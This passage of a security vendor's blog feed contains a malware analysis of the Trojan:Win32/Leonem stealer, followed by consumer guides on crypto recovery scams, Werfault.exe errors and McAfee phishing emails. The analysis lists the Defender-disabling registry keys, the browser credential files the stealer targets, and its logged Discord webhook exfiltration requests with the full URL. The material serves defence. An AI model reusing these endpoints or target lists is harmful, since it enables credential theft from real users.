    C:\Windows\system32\SecurityHealthService.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

    Data Collection

    After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text from the keyboard. It specifically targets the following file path:

    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    C:\Users\\AppData\Local\360Chrome\Chrome\User Data
    C:\Users\\AppData\Local\Chromium\User Data
    C:\Users\\AppData\Local\Mailbird\Store\Store.db
    C:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    C:\Users\\AppData\Local\Microsoft\Edge\User Data\Login Data
    C:\Users\\AppData\Local\Tencent\QQBrowser\User Data\Default\EncryptedStorage

    C:\Users\\AppData\Local\Torch\User Data
    C:\Users\\AppData\Local\UCBrowser\
    C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\logins.json
    C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles\1hmu7354.default-release\signons.sqlite
    C:\Users\\AppData\Roaming\Mozilla\Firefox\profiles.ini
    C:\Users\\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
    C:\Users\\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
    C:\Users\\AppData\Roaming\Thunderbird\profiles.ini

    Leonem collects data both in plain text and in the form of a hash.

    Data Exfiltration

    At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhooks.

    POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
    POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

    The 200 status at the end means that the request was successfully completed, and the 404 on the other hand indicates an error. This likely indicates that the webhook has either been deleted or changed. In addition, the malware utilizes the ip-api.com service to retrieve details about the hosting environment where it is executed. In this way, it tries to determine whether it is running on the server used for hosting or on a regular computer.

    How To Remove Trojan:Win32/Leonem?

    As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    The post Trojan:Win32/Leonem appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/trojan-win32-leonem/feed/ 0 26937
    Crypto Recovery Services https://gridinsoft.com/blogs/cryptocurrency-recovery-scams/ https://gridinsoft.com/blogs/cryptocurrency-recovery-scams/#comments Wed, 11 Sep 2024 12:28:05 +0000 https://gridinsoft.com/blogs/?p=16561 Crypto recovery scams are a specific type of fraudulent activity that piggybacks on victims of cryptocurrency scams. Con actors offer their help in restoring the lost money on the Internet, claiming to be professional recovery agents. What they do is defraud people once again, charging sums comparable to the amount of the initial loss. Crypto… Continue reading Crypto Recovery Services

    The post Crypto Recovery Services appeared first on Gridinsoft Blog.

    ]]>
    Crypto recovery scams are a specific type of fraudulent activity that piggybacks on victims of cryptocurrency scams. Con actors offer their help in restoring the lost money on the Internet, claiming to be professional recovery agents. What they do is defraud people once again, charging sums comparable to the amount of the initial loss.

    Crypto Recovery Scam Explained

    The hype around cryptocurrencies has slowed down recently, but the number of scams related to this topic has never come down. Moreover, another vector has emerged – crypto recovery scam, which targets people who have already become victims of crypto fraud.

    Getting into a financial fraud related to an investment can hit the wallet pretty hard, so the urge to get the money back has obvious motivation. In certain cases, it is technically possible to recover lost assets, and some legitimate organizations can assist victims in doing so. Still, it is very individual and depends on many factors, and there is never a guarantee of success.

    The loss of cryptocurrency can occur for a variety of reasons, including technical failures (dead hardware wallet key) or human factors. But what the fraudsters concentrate their attention on are fraudulent investment schemes rather than technical issues. Incidentally, we have a separate post about cryptocurrency fraud, but this time we will focus on fraudulent “cryptocurrency recovery agencies”. Long story short – attackers could not ignore people who fell victim to one scam and developed a whole scheme to scam them again.

    Examples of Recovery Services

    Domain Description Registration
    Againstcon.com A site masquerading as a crypto recovery service, possibly fraudulent. 2023-02-09
    Cleedenz.com Fraudulent site offering services to recover lost cryptocurrencies. 2023-10-09
    Fiordintel.net A phishing site pretending to be a service for tracking and recovering cryptocurrencies. 2024-07-02
    Walletblockchain.net A deceptive site offering fake solutions for recovering cryptocurrencies. 2024-07-17
    Leeultimatehacker.com A scam site promising to hack accounts to recover lost funds. 2024-04-05
    You can conduct your own investigation using our Inspector API by performing a search with the tag “Recovery Servicehere.

    How Do Crypto Recovery Scams Work?

    Usually, these scammers are looking for victims on social media, particularly in crypto investment-related groups or trading forums. It all starts with comments from people who allegedly have managed to get their money back. They provide the contact information of a ‘specialist’ and claim to have helped but are actually part of the fraudulent scheme. In another scenario, fraudsters directly contact victims (mostly in crypto communities) and offer their help in restoring their crypto assets. One more scheme involves fraudsters selling lists of victims they have deceived or hacked on the Darknet.

    Fake review about crypto recovery agent screenshot
    Fake review about crypto recovery agent

    After the victim contacts the scammer, they will immediately ask for as much information as possible. This may seem quite logical, since such an operation requires a full pack of victim’s info. However, the scammer will always ask for things that will barely be needed – SSN, detailed personal information, and so on. In addition to this data, attackers almost always require an upfront fee for their work. Quite often, the frauds simply cut any connections upon the upfront payment, but not always. It is often to see them imitating the progress, and asking for more money after some time. Scammers explain this as “additional funds are needed to solve the problem”. Attackers employ a lot of social engineering tactics, which can result in multiple requests for money before they eventually stop responding to the victim.

    Red Flags and Potential Risks

    Let’s take a look at the main red flags that you’re dealing with a scam. The first thing that should raise concern is a request to make a prepayment without any guarantees. Sure, scammers will promise guaranteed recovery of your funds, but such a guarantee is impossible. Definite false claim = quite an obvious red flag.

    The next red flag is the claim that they have “special access”, a private connection with the FBI or another law enforcement agency. Without a confirmation, this claim costs nothing, and any “informal connections” still give you no guarantee that this FBI friend will be helpful. And, after all, if they’re talking about law enforcement – why won’t you go directly to them? The majority of investigation agencies around the world nowadays have an online fraud department, which will be in handy for this case.

    Chat with scammers
    Private FBI agent-as-a-service

    Another sign that you are dealing with fraudsters is a sense of urgency and persistence on their part. In this case, the urgency comes not only from the scammers but also from the victim. Frauds often insist that you should not notify law enforcement about the incident, which is a strange demand from “legit money recovery agents” as they present themselves.

    The risks of all this, as you can imagine, are quite high. First of all, there are significant financial losses. Usually, fraudsters demand large sums upfront because they realize that the victim is ready to do anything to get the lost crypto back. Secondly, there is the risk of confidential information leakage. Attackers can request credit card information or login details to an online bank. They may then either use this information to finally empty the victim’s accounts or resell this data on the Darknet.

    6 Warning Signs

    Most crypto recovery services are scams — especially if they promise to return crypto you no longer own. Look out for these warning signs:

    1. They ask for an upfront fee. If someone asks for money before helping you, it’s likely a scam. They might ask for a small amount first, then keep asking for more.
    2. They claim to have “special access” to crypto exchanges. Scammers will say they have secret ways to get your crypto back. This is always a lie.
    3. They ask for your passphrase or sensitive info. If they want this information, they are trying to steal from you.
    4. They ask for your bank or crypto wallet details. Scammers may ask for your wallet or bank info to “deposit” the recovered crypto. They just want to steal more money.
    5. No physical address or located outside the U.S. If there’s no address, or it’s outside the U.S., it could be fake. Many scam companies use fake addresses.
    6. No phone number or only messaging apps. Legit companies talk by phone. Scammers use apps like Telegram or WhatsApp to hide.

    How To Avoid Scams?

    If you’ve been a victim of a crypto recovery scam, I have a few recommendations that may help. First, report the platform support through which you were defrauded. Contact the platform’s technical support and report the incident. The next step will be filing a report with law enforcement and gathering as much case evidence as you can. While this still cannot guarantee a refund, it can significantly increase the chances of one. Detailed information will also help men in uniform with finding and detaining the fraudsters.

    Complaint Form for crypto recovery scam victims
    Complaint Form for crypto recovery scam victims

    Also you can report scams to:

    • The Federal Trade Commission (FTC)
    • The Commodity Futures Trading Commission (CFTC)
    • The U.S. Securities and Exchange Commission (SEC)
    • The FBI’s Internet Crime Complaint Center (IC3)

    If you have found an organization that helps you recover your lost funds, research its procedures, refund methods, and real user reviews on the Internet. The major challenge is that recovering stolen cryptocurrency is extremely difficult to recover. And almost the only way to do this is to collect as much evidence and information as possible, gather the necessary package of documents and submit it to law enforcement agencies. Law enforcement may contact the platform’s representatives. If proven that the stolen crypto belongs to the victim, there is a chance that it will be returned. This is the only legal way to get the lost crypto back.

    Crypto Recovery Services

    The post Crypto Recovery Services appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/cryptocurrency-recovery-scams/feed/ 5 16561
    Werfault.exe Error https://gridinsoft.com/blogs/werfault-exe-error-troubleshooting/ https://gridinsoft.com/blogs/werfault-exe-error-troubleshooting/#respond Tue, 10 Sep 2024 16:28:15 +0000 https://gridinsoft.com/blogs/?p=20206 Werfault.exe is a system process used to collect information about program errors, which helps diagnose and resolve issues to improve the user experience. In certain cases, it can repeatedly crash, displaying an error message, and also be used by malware. What is Werfault.exe? Werfault.exe is a Windows Error Reporting (WER) process. It is responsible for… Continue reading Werfault.exe Error

    The post Werfault.exe Error appeared first on Gridinsoft Blog.

    ]]>
    Werfault.exe is a system process used to collect information about program errors, which helps diagnose and resolve issues to improve the user experience. In certain cases, it can repeatedly crash, displaying an error message, and also be used by malware.

    What is Werfault.exe?

    Werfault.exe is a Windows Error Reporting (WER) process. It is responsible for handling error reporting in Windows operating systems. WerFault.exe was first released on 11/08/2006 for Windows Vista and is still present in Windows 10 and 11. Such errors arise when loading WerFault fails, either during the start of the application or, in some cases, while the application is running.

    Thus, when a program encounters an error, Werfault collects information about it. It includes the program causing the error, the nature of the error, and system information. Next, Werfault offers options for sending this information to Microsoft for analysis. This will help Microsoft improve the stability and reliability of Windows (probably). Werfault.exe typically runs in the background and should not usually require user interaction unless prompted by an error.

    Fix Werfault.exe Application Error

    Werfault.exe error usually means an issue with the Windows Error Reporting process or an application causing it to crash. However, it’s nothing to worry about if it only happens one or two times!

    Werfault.exe Application Error
    Werfault.exe Application Error itself

    But if the WerFault.exe error occurs repeatedly and causes trouble, or if it takes a relatively high CPU power in Task Manager, you should take action to resolve it. Here are some steps that you can take to try and fix this issue:

    Step 1. Update Windows

    Windows constantly improves to enhance its stability and reduce program crashes. To achieve this goal, Microsoft provides regular security updates and bug fixes. You may encounter security issues and bugs if you don’t install these updates. A couple of particular Windows updates broke WerFault, which Microsoft addressed in further patches. To check for updates, press the Windows key + I and click “Windows Update”. If there are any updates available, download and install them.

    Windows Update
    If you can see this, you’ve done it right.

    Step 2. Run the Windows SFC Scan

    The SFC tool repairs corrupt system files that can cause Werfault.exe errors. Press Windows key + R, type “cmd”, and hit Ctrl+Shift+Enter to open Command Prompt as administrator. Next, type or paste in the Command Prompt “sfc /scannow” and press enter.

    sfc command

    After completing the scan, Windows will attempt to repair any corrupt files. Finally, restart your device and check if the error is corrected. If the scan finds corrupt files, but Windows is unable to repair them, try repairing corrupt system files using repair tools.

    Important note! Avoid downloading and copying WerFault.exe to your Windows system directory from third-party sites. Microsoft typically does not release standalone Windows EXE files for download because they are already bundled together inside a software installer. This may cause system instability and stop your program or OS from functioning.

    Step 3. Use Repair Mode

    Please restart your PC using the pressed Shift button—this will turn the device into Automatic Repair. Select Advanced options to enter WinRe and choose your language. Next, select the Troubleshoot and Advanced options.

    Command promt in the recovery mode

    Select Command Prompt, log in with your account and run the below commands.

    chkdsk X: /f
    bootrec /fixmbr
    bootrec /fixboot
    bootrec /scanos
    bootrec /rebuildbcd

    📖 Note: If you installed the system update before the system is abnormal, you can use “Uninstall Updates” to uninstall recent updates (which include Quality updates and Feature updates; try both).

    Step 4. Try to Find Malware

    While Werfault.exe is a legit executable file, its activity may be attributed to malicious software. Hackers use DLL sideloading technique by exploiting the WerFault.exe tool to deploy malware onto compromised systems. This method allows them to infect devices discreetly without triggering antivirus alarms. During this exploitation, you may see the said errors coming from WerFault.exe, as well as the process itself in the Task Manager.

    Malware can sometimes exploit genuine processes in its activity. This can cause program crashes and, in some cases, trigger the werfault.exe error. I recommend GridinSoft Anti-Malware; it is best suited to detect and remove even sophisticated malware.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    The post Werfault.exe Error appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/werfault-exe-error-troubleshooting/feed/ 0 20206
    McAfee Scam Email https://gridinsoft.com/blogs/mcafee-scam-email/ https://gridinsoft.com/blogs/mcafee-scam-email/#respond Tue, 10 Sep 2024 14:51:29 +0000 https://gridinsoft.com/blogs/?p=11280 The McAfee email scam is a dangerous form of phishing fraud targeting users’ accounts at this antivirus vendor. Fraudsters lure users with appealing offers or urgent notifications about changes in terms, requiring immediate attention. This scam exhibits many variations and can have numerous consequences. McAfee Email Scam Targets Your Credentials This phishing scheme involves emails… Continue reading McAfee Scam Email

    The post McAfee Scam Email appeared first on Gridinsoft Blog.

    ]]>
    The McAfee email scam is a dangerous form of phishing fraud targeting users’ accounts at this antivirus vendor. Fraudsters lure users with appealing offers or urgent notifications about changes in terms, requiring immediate attention. This scam exhibits many variations and can have numerous consequences.

    McAfee Email Scam Targets Your Credentials

    This phishing scheme involves emails that guide users to a malicious webpage, mimicking the design of a simple login site. While scams involving email messages from strangers may employ various tactics, this particular scam impersonates routine notifications from McAfee concerning account details or user licenses. Offers might include a free license for one year, a prompt to approve changes to McAfee policies, or a reminder to renew a soon-to-expire license. However, the phrasing of these messages often renders them suspicious, as genuine communications from McAfee would not include such claims. Is there a specific McAfee scam email circulating in 2023 within the cybersecurity community?

    McAfee scam email
    The example of a fake renewal message

    At the bottom of the email, or within the text itself, there is a link or button you can click to get more details. Regardless of the lure, it leads to a phishing page—one that mimics the McAfee login page or a fraudulent survey site. The former is typical of more alarming messages, while the latter usually accompanies offers of gifts. Does McAfee send these types of emails?

    The phishing login page features only two states: the default one and a “wrong login/password” notification beneath the credential fields. No matter what you enter, the information is sent directly to fraudsters who can then take control of your account. Additionally, from the phishing page designed to steal your credentials, the site may also include a download button. This button could install software that you would never willingly download, such as adware or rogue applications, which are commonly linked to such scams.

    McAfee email scam giveaway
    McAfee scam: Fake giveaway messages looks like this

    Pseudo-giveaway that promises you a gift will likely ask you for your personal information. Shady persons on the Darknet are willing to pay a lot for a database of users’ information. The pack of name/surname/physical address/email address/system information et cetera gives a lot of advantages for other scams.

    Rarely, the message may contain the attached file, and the text allows you to open it instead of following the link. In this file, you’re supposed to see details about the changes in the terms or other stuff they used as a disguise for a letter. This attachment (often a .docx or .xlsx document) contains a virus.

    How Dangerous is the McAfee Email Scam?

    The main risk associated with following the instructions in a scam email is the theft of your account credentials and personal information. While sharing information with various online services might seem commonplace, these services are typically bound by GDPR rules to keep your data confidential. However, cybercriminals obtaining your information through phishing do not adhere to any rules or laws. Often, this stolen information is compiled into databases and sold on the Darknet, where the new owners are unlikely to have benevolent intentions.

    Your McAfee account credentials are particularly valuable as they serve dual purposes. Possession of your account allows a criminal to steal your license key, which might be used to activate a pirated copy of the software or sold online at a fraction of the price you originally paid. If your license covers multiple devices, prepare for potential unauthorized users, or “squatters“, on your account. Additionally, stolen credentials can be added to databases of leaked passwords and logins, which are often utilized in brute force attacks to crack other accounts.

    The injection of malware via an email attachment represents another significant threat. Unlike identity theft or account hacking, which may not have immediate effects, malware begins to operate as soon as it is launched. Phishing scams, such as those mimicking McAfee, have become a primary method for distributing malware, posing a serious risk to both individual users and corporations due to human vulnerabilities. The most common types of malware distributed this way include stealers, spyware, and ransomware, which can lead to compromised accounts and encrypted data—a highly undesirable outcome.

    How to Protect Yourself from McAfee Email Scams?

    The good news about most email scams is that they can easily be mitigated by simple attentiveness. Upon receiving a suspicious email, it is crucial to scrutinize both the body and header of the message. Even the most sophisticated forgeries will contain discrepancies that don’t match the original communications. Simpler scams often exhibit other telltale signs that can help you identify the deceit. So, how can you stop McAfee scam emails?

    Typos and Grammatical Errors

    Despite the prevalence of online spell checkers, scammers often neglect to use them, resulting in numerous errors in their messages. Poor English, missing punctuation, and subpar design are not features of official communications. The presence of these errors is a clear indicator of a fraudulent email.

    McAfee email scam
    That message does not look like a regular McAfee invoice

    Link address

    Genuine messages may contain links to their website – for instructions, for example. However, they always belong to the original sender’s domain (mcafee.com for the genuine McAfee email message case). If you see the link to a dubious page, like WebProtectionProgram, or a short link, that is the reason to avoid clicking it. Official mailing never contains links to external sites and never applies using short links.

    While using the Internet is impossible without the annoying forwarding of letters over the network. How to legally get spam email revenge?

    Sender’s email address

    There are official email addresses companies use for mailing or conversations. They are often listed on their website. Receiving a letter that pretends to be sent by McAfee support, but the sender is mikey19137@aol.com does not look trustworthy. In complicated situations, crooks may try to use email addresses that look related to the sender. That’s why it is better to review the contacts on the website. For McAfee, those are the following:

    info@authenticate.mcafee.com
    Info@notification.mcafee.com
    info@protect.mcafee.com
    info@smmktg.mcafee.com
    info@smtx.mcafee.com
    info@mailing.mcafee.com
    info@communication.mcafee.com
    info@protect.mcafee.com.cname.campaign.adobe.com
    donotreply@authentication.mcafee.com
    donotreply@mcafee.com
    consumersupport@mcafee.com
    donotreply@authentication.mcafee.com
    mcafeeinc-mkt-prod2@adobe-campaign.com
    noreply@mail.idtheftprotection.mcafee.com
    research@mcafee.com
    mcafee@mail.email-ssl.com
    no_reply@mcafee.com
    no-reply@mcafeemobilesecurity.com

    Strange Offers and Unusual Notifications

    Giveaways, quizzes, or notifications about account blocking are not typical for reputable companies. They may contact you if there are issues with your account that need resolving, but you would likely be aware of these issues beforehand. Conversely, offers that require you to share personal information in exchange for a prolonged license are never legitimate. Coupled with the other signs we’ve discussed, these offers clearly indicate a fraudulent message.

    What is Geek Squad email scam, and how to avoid and stay safe? It informs you about the transaction made in your account, but you don’t remember anything about the purchase.

    Is it Possible to Avoid Email Spam in the Future?

    Receiving email spam does not necessarily mean something bad has already happened. Scammers often buy databases filled with random email addresses and send out mass emails hoping to lure someone into a scam. If you do not respond or click on any links, scammers will likely remove you from their list eventually. However, any engagement, such as replying or clicking a link, signals to them that your account is active and susceptible to scams. Experts note that any interaction with a fraudulent email can lead to a significant increase in spam.

    Several strategies can help reduce the amount of spam you receive and make it easier to differentiate between genuine and fraudulent emails. First, use a separate email address for registrations on websites or at events where you have concerns about their credibility. Some sites may not prioritize protecting their clients’ data and might sell their databases to third parties. While not always malicious, this practice can lead to unwanted exposure for your primary email address. Using a secondary email address as a buffer can help protect your main accounts from suspicious activities, ensuring greater security for your personal or work emails.

    Report suspicious email
    Report about suspicious email

    Another tip involves reporting suspicious emails. While most email services employ advanced anti-spam engines to filter out the bulk of spam, no system is perfect. You might still find McAfee phishing emails in your inbox. Reporting these deceptive messages is straightforward: simply click the button with three dots on the message and select “Report Spam.”

    Conclusion

    In the fight against email scams, especially sophisticated ones like the McAfee email scam, proactive protection is key. While following the tips outlined above can significantly reduce your risk of falling victim to these scams, having robust antivirus software can provide an additional layer of security. We recommend using Anti-Malware for its effective detection and removal of malware threats.

    GridinSoft Anti-Malware main screen

    Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

    After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

    Scan results screen

    Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

    Removal finished

    The post McAfee Scam Email appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/mcafee-scam-email/feed/ 0 11280